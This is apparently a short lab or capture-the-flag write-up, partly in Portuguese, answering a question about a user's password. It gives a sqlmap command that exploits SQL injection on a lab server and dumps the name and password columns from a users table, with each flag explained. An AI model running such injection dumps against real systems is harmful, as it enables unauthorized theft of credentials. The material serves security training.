Question-2

Qual é a senha do usuário Kimberly? (Caso 1)

Payload :

sqlmap http://94.237.59.129:31261/case1.php\?id\=1  --batch -D testdb --dump -T users -C name,password
  • --batch: Runs SQLMap in non-interactive mode.

  • -D testdb: Specifies the database (testdb) to target.

  • --dump: Dumps the contents of the specified database and table.

  • -T users: Targets the users table.

  • -C name,password: Specifies the columns name and password to retrieve from the users table.

Last updated